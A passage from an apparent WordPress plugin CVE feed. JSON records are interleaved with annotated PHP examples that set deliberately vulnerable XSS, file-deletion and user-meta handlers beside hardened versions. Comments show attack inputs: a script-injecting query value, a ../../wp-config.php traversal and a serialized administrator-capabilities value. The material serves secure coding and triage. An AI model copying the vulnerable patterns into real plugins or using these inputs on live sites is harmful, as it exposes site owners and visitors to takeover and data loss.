link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/wpep_setup.php?rev=2426641#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/wpep_setup.php?rev=2426641#L219\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2551919%40wp-easy-pay&new=2551919%40wp-easy-pay&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2551919%40wp-easy-pay&new=2551919%40wp-easy-pay&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fbb3a6-fcc2-47c5-a086-331e69292add?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fbb3a6-fcc2-47c5-a086-331e69292add?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5001","slug":"horizontal-scrolling-announcement","versionImpact":"9.2","description":"The Horizontal scrolling announcement for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'horizontal-scrolling' shortcode in versions up to, and including, 9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L389\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4f60e8c-2745-4930-9101-914bd73c6e1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4f60e8c-2745-4930-9101-914bd73c6e1c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3829","slug":"font-awesome-4-menus","versionImpact":"4.7.0","description":"The Font Awesome 4 Menus WordPress plugin through 4.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/684941ad-541f-43f9-a7ef-d26c0f4e6e21\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/684941ad-541f-43f9-a7ef-d26c0f4e6e21\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4274","slug":"essential-real-estate","versionImpact":"4.4.2","description":"The Essential Real Estate plugin for WordPress is vulnerable to unauthorized loss of data due to insufficient validation on the remove_property_attachment_ajax() function in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dc41eb7-5c9a-4a67-902d-9a855840668b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7dc41eb7-5c9a-4a67-902d-9a855840668b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/trunk\\\/public\\\/partials\\\/property\\\/class-ere-property.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-real-estate\\\/trunk\\\/public\\\/partials\\\/property\\\/class-ere-property.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11682","slug":"gwebpro-store-locator","versionImpact":"2.1","description":"The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gwebpro-store-locator\\\/trunk\\\/gwebpro-store-locator-frontend.php#L452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gwebpro-store-locator\\\/trunk\\\/gwebpro-store-locator-frontend.php#L452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11686","slug":"manycontacts-bar","versionImpact":"3.0.4","description":"The WhatsApp ?? click to chat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'manycontacts_code' parameter in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/manycontacts-bar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/manycontacts-bar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d623840-30d1-4599-a52d-08c28e190699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d623840-30d1-4599-a52d-08c28e190699?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
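The stored-XSS-via-shortcode records (CVE-2023-5001 above and the later shortcode and block entries) and the reflected-XSS records (CVE-2024-11684, CVE-2024-11686 and similar) are the same defect at different storage points: attacker-controlled text reaches markup without escaping for its output context. The block below is an added illustration, not code from Horizontal scrolling announcement, G Web Pro Store Locator, ManyContacts or any plugin in this feed; the shortcode, parameter and option names are hypothetical. It shows the vulnerable shape and the hardened shape for a shortcode, for a reflected GET parameter, and for an admin setting, the last being the "even when unfiltered_html is disallowed" case that several WPScan records in this feed describe.

```php
<?php
// Added illustration (hypothetical names); not code from any plugin in this feed.

// --- Stored XSS shape: shortcode attributes echoed straight into markup. ---
// A Contributor saves [example_ticker text="..." speed="..." style="..."] in a post;
// the values land in the page unescaped and run for every visitor.
function example_ticker_vulnerable( $atts ) {
    return '<marquee scrollamount="' . $atts['speed'] . '" style="' . $atts['style'] . '">'
         . $atts['text'] . '</marquee>';
}

// --- Hardened shape: declare the attributes, coerce types, escape per context. ---
function example_ticker_hardened( $atts ) {
    // shortcode_atts() drops any attribute not in this list and fills defaults,
    // so a free-form "style" attribute simply does not exist.
    $atts = shortcode_atts(
        array( 'text' => '', 'speed' => 6, 'color' => '#000000', 'link' => '' ),
        $atts,
        'example_ticker'
    );

    $speed = absint( $atts['speed'] );                                   // integer attribute
    $color = preg_match( '/^#[0-9a-fA-F]{6}$/', $atts['color'] )
        ? $atts['color'] : '#000000';                                     // CSS value: fixed grammar
    $link  = esc_url( $atts['link'] );                                   // URL: esc_url() drops javascript:
    $text  = wp_kses_post( $atts['text'] );                              // limited HTML, no script/on*

    // Escaping follows the output context: attribute, URL, or HTML body.
    $html  = '<div class="example-ticker" data-speed="' . esc_attr( $speed ) . '"';
    $html .= ' style="color:' . esc_attr( $color ) . '">';
    $html .= '' !== $link ? '<a href="' . $link . '">' . $text . '</a>' : $text;
    $html .= '</div>';
    return $html;
}
add_shortcode( 'example_ticker', 'example_ticker_hardened' );

// --- Reflected XSS shape: a GET parameter echoed back into a form. ---
// ?q="><script>...</script> closes the attribute and runs for whoever follows the link.
function example_search_form_vulnerable() {
    echo '<input type="text" name="q" value="' . $_GET['q'] . '">';
}

// Hardened: unslash, sanitise on input, escape on output.
function example_search_form_hardened() {
    $q = isset( $_GET['q'] ) ? sanitize_text_field( wp_unslash( $_GET['q'] ) ) : '';
    echo '<input type="text" name="q" value="' . esc_attr( $q ) . '">';
}

// --- Admin settings: the "unfiltered_html disallowed" case. ---
// On multisite, or where DISALLOW_UNFILTERED_HTML is set, even administrators must
// not be able to persist script. The sanitize_callback enforces that on save and
// the option is still escaped when rendered.
add_action( 'admin_init', function () {
    register_setting( 'example_options', 'example_footer_note', array(
        'type'              => 'string',
        'sanitize_callback' => 'wp_kses_post',
        'default'           => '',
    ) );
} );

function example_footer_note() {
    echo wp_kses_post( get_option( 'example_footer_note', '' ) );
}
```

The practitioner's check when triaging any of these records is the same: find the `echo`/`return` that builds markup, identify the context of each interpolated value (HTML body, attribute, URL, JavaScript, CSS), and confirm that the matching `esc_*`/`wp_kses_*` call sits on the output path, not only on the input path.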
{"CVE_ID":"CVE-2024-13767","slug":"live-2d","versionImpact":"1.9.11","description":"The Live2DWebCanvas plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ClearFiles() function in all versions up to, and including, 1.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-2d\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-2d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23c89d9f-8958-4333-8604-54173c31efac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23c89d9f-8958-4333-8604-54173c31efac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
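CVE-2024-13767 above (arbitrary file deletion through insufficient path validation) and CVE-2024-4274 earlier in this feed (deleting arbitrary attachments without an ownership check) are both deletion handlers that trust the request to name the target. The block below is an added illustration, not code from Live2DWebCanvas, Essential Real Estate or any plugin listed here; the action, directory and parameter names are hypothetical. It shows the vulnerable shape for a raw path, a hardened version that confines deletion to one plugin-owned directory with `realpath()`, and the ownership check that the attachment case needs.

```php
<?php
// Added illustration (hypothetical names); not code from any plugin in this feed.

// --- Vulnerable shape: a relative path from the request goes straight to unlink(). ---
// file=../../wp-config.php removes the configuration; with it gone, the installer
// becomes reachable again, which is the route to code execution the record mentions.
function example_clear_files_vulnerable() {
    $file = $_POST['file'];
    unlink( ABSPATH . $file );
    wp_send_json_success();
}

// --- Hardened shape: confine every deletion to one directory the plugin owns. ---
function example_cache_dir() {
    $upload = wp_upload_dir();
    return trailingslashit( wp_normalize_path( $upload['basedir'] ) ) . 'example-cache';
}

function example_delete_cache_file( $requested ) {
    $base = realpath( example_cache_dir() );
    if ( false === $base ) {
        return new WP_Error( 'no_cache_dir', 'cache directory does not exist' );
    }
    // Keep only the final path component: no directories, no traversal sequences.
    $name = basename( wp_normalize_path( (string) $requested ) );
    if ( '' === $name || '.' === $name || '..' === $name ) {
        return new WP_Error( 'bad_name', 'invalid file name' );
    }
    // Resolve symlinks, then require the canonical path to sit under $base.
    $target = realpath( $base . DIRECTORY_SEPARATOR . $name );
    if ( false === $target || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        return new WP_Error( 'outside_base', 'refusing to delete outside the cache directory' );
    }
    if ( ! is_file( $target ) ) {
        return new WP_Error( 'not_a_file', 'target is not a regular file' );
    }
    return unlink( $target );
}

function example_clear_files_hardened() {
    check_ajax_referer( 'example_clear_files', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $file   = isset( $_POST['file'] ) ? wp_unslash( $_POST['file'] ) : '';
    $result = example_delete_cache_file( $file );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 400 );
    }
    wp_send_json_success();
}
add_action( 'wp_ajax_example_clear_files', 'example_clear_files_hardened' );

// --- Attachment deletion: the ownership check the attachment record lacks. ---
function example_remove_property_attachment() {
    check_ajax_referer( 'example_remove_attachment', 'nonce' );
    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;
    // delete_post on an attachment is granted to its author or to users who may
    // delete others' posts; a Subscriber cannot pass it for someone else's upload.
    if ( ! $attachment_id || ! current_user_can( 'delete_post', $attachment_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( 'attachment' !== get_post_type( $attachment_id ) ) {
        wp_send_json_error( 'not an attachment', 400 );
    }
    wp_delete_attachment( $attachment_id, true );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_remove_property_attachment', 'example_remove_property_attachment' );
```

`realpath()` returns `false` for a path that does not exist, so the check also refuses to act before a symlink could be planted; comparing against `$base . DIRECTORY_SEPARATOR` rather than `$base` alone prevents a sibling directory such as `example-cache2` from passing the prefix test.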
{"CVE_ID":"CVE-2025-31915","slug":"pixel-formbuilder","versionImpact":"1.0.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in kamleshyadav Pixel WordPress Form BuilderPlugin & Autoresponder allows Cross Site Request Forgery. This issue affects Pixel WordPress Form BuilderPlugin & Autoresponder: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pixel-formbuilder\\\/vulnerability\\\/wordpress-pixel-wordpress-form-builderplugin-autoresponder-1-0-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7722","slug":"social-streams","versionImpact":"1.0.1","description":"The Social Streams plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their user meta information in the update_user_meta() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change their user type to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-streams\\\/trunk\\\/src\\\/php\\\/JsonAPI.php#275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-streams\\\/trunk\\\/src\\\/php\\\/JsonAPI.php#275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3f01b88-6f93-4ee8-8d59-9165ebcd4dd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3f01b88-6f93-4ee8-8d59-9165ebcd4dd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
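The CVE-2025-7722 record above describes a write to user meta where the caller, not the server, decides which user and which keys are touched; on WordPress the role lives in the `{$wpdb->prefix}capabilities` user-meta key, which is why an unrestricted `update_user_meta()` is a direct route to administrator. The block below is an added illustration, not code from Social Streams or any plugin in this feed; the REST route, meta keys and function names are hypothetical. It shows the vulnerable shape beside a hardened endpoint that takes the target user from the session, allowlists the writable keys, and declares a `permission_callback`.

```php
<?php
// Added illustration (hypothetical names); not code from any plugin in this feed.

// --- Vulnerable shape: the caller chooses the user and the meta keys. ---
// A Subscriber sends meta[wp_capabilities]=a:1:{s:13:"administrator";b:1;} for
// their own user_id and is an administrator on the next request.
function example_update_profile_vulnerable( WP_REST_Request $request ) {
    $user_id = (int) $request['user_id'];
    foreach ( (array) $request['meta'] as $key => $value ) {
        update_user_meta( $user_id, $key, $value );
    }
    return rest_ensure_response( array( 'ok' => true ) );
}

// --- Hardened shape. ---
// 1. The target user is the authenticated caller, never a request parameter.
// 2. Only plugin-owned keys can be written, each through a named sanitizer.
// 3. The route declares a permission_callback.
function example_allowed_user_meta() {
    // key => sanitizer. Anything else, including {$wpdb->prefix}capabilities,
    // {$wpdb->prefix}user_level and session_tokens, never reaches update_user_meta().
    return array(
        'example_display_handle' => 'sanitize_text_field',
        'example_feed_url'       => 'esc_url_raw',
        'example_items_per_page' => 'absint',
    );
}

function example_update_profile_hardened( WP_REST_Request $request ) {
    $user_id = get_current_user_id();
    $allowed = example_allowed_user_meta();
    $meta    = (array) $request->get_param( 'meta' );
    $written = array();

    foreach ( $meta as $key => $value ) {
        if ( ! isset( $allowed[ $key ] ) ) {
            continue; // unknown or protected key: ignored, not written
        }
        $sanitize        = $allowed[ $key ];
        $written[ $key ] = $sanitize( $value );
        update_user_meta( $user_id, $key, $written[ $key ] );
    }
    return rest_ensure_response( array( 'ok' => true, 'updated' => array_keys( $written ) ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/profile', array(
        'methods'             => WP_REST_Server::EDITABLE,
        'callback'            => 'example_update_profile_hardened',
        // Cookie-authenticated REST requests must carry a valid X-WP-Nonce, or core
        // treats them as anonymous and is_user_logged_in() is false here.
        'permission_callback' => function () {
            return is_user_logged_in();
        },
        'args' => array(
            'meta' => array( 'type' => 'object', 'required' => true ),
        ),
    ) );
} );
```

If a plugin genuinely needs to let one user edit another's data, the check becomes `current_user_can( 'edit_user', $target_id )`, and the key allowlist still applies: capability and role keys are only ever changed through `WP_User::set_role()` by a caller who holds `promote_users`.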
{"CVE_ID":"CVE-2023-2604","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0.17","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.17&old=2910236&new_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.18&new=2910236&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.17&old=2910236&new_path=%2Fcircle-image-slider-with-lightbox%2Ftags%2F1.0.18&new=2910236&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2627ac2b-25a8-480d-ac83-ee0ca323b3a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2627ac2b-25a8-480d-ac83-ee0ca323b3a1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4410","slug":"qtranslate-slug","versionImpact":"1.1.18","description":"The Qtranslate Slug plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.18. This is due to missing or incorrect nonce validation on the save_postdata() function. This makes it possible for unauthenticated attackers to save post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qtranslate-slug\\\/trunk\\\/includes\\\/class-qtranslate-slug.php#L2099\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qtranslate-slug\\\/trunk\\\/includes\\\/class-qtranslate-slug.php#L2099\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d682596-c32d-4abd-ba39-b57fc45c9ce0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d682596-c32d-4abd-ba39-b57fc45c9ce0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4994","slug":"allow-php-in-posts-and-pages","versionImpact":"3.0.4","description":"The Allow PHP in Posts and Pages plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.0.4 via the 'php' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-in-posts-and-pages\\\/trunk\\\/allowphp.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-in-posts-and-pages\\\/trunk\\\/allowphp.php#L373\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d8b4bb6-3715-40c1-8140-7fcf874ccec3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d8b4bb6-3715-40c1-8140-7fcf874ccec3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5073","slug":"iframe-forms","versionImpact":"1.0","description":"The iframe forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'iframe' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe-forms\\\/trunk\\\/iframe-forms.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe-forms\\\/trunk\\\/iframe-forms.php#L29\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818de7f7-913a-4ade-927e-bba281b4709a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818de7f7-913a-4ade-927e-bba281b4709a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3739","slug":"wp-best-quiz","versionImpact":"1.0","description":"The WP Best Quiz WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9f39ced-1e0f-4559-b861-39ddcbcd1249\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9f39ced-1e0f-4559-b861-39ddcbcd1249\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7167","slug":"persian-fonts","versionImpact":"1.6","description":"The Persian Fonts WordPress plugin through 1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a2eb871-6b6e-4dbb-99f0-dd74d6c61e83\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a2eb871-6b6e-4dbb-99f0-dd74d6c61e83\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
